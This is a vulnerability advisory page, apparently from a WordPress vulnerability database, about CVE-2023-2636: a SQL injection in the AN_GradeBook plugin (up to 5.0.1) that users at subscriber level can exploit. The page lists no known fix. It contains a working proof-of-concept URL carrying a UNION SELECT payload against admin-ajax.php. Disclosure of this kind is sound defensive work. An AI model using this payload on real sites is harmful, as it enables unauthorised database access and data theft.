WordPress Plugin Vulnerabilities

AN_GradeBook <= 5.0.1 - Subscriber+ SQLi

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber

Proof of Concept

Access the following URL to demonstrate SQLi:

http://example.com/wp-admin/admin-ajax.php?action=course&id=-9264%20UNION%20ALL%20SELECT%20CONCAT(0x7171717071,0x5141527377414962644f774c4477524d43624b4e5a74584c594d58596f444141504e767158546162,0x717a767a71),NULL,NULL,NULL,NULL--%20-

Affects Plugins

Plugin icon
an-gradebook
No known fix

References

CVE
CVE-2023-2636

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Lukas Kinneberg
Submitter
Lukas Kinneberg
Submitter website
https://github.com/lukinneberg
Verified
Yes
WPVDB ID
6a3bfd88-1251-4d40-b26f-62950a3ce0b5

Timeline

Publicly Published
2023-06-26 (about 10 months ago)
Added
2023-06-26 (about 10 months ago)
Last Updated
2023-06-26 (about 10 months ago)

Other

Published
Title
Published
2022-11-07
Title
WP User Merger < 1.5.3 - Admin+ SQLi via ID
Published
2024-01-05
Title
WP ERP < 1.12.9 - Authenticated (Accounting manager+) SQL Injection
Published
2020-02-10
Title
Participants Database < 1.9.5.6 - Authenticated Time Based SQL Injection
Published
2023-09-11
Title
Slimstat Analytics < 5.0.10 - Contributor+ SQL Injection
Published
2016-12-12
Title
WP Private Messages 1.0.1 – Authenticated SQL Injection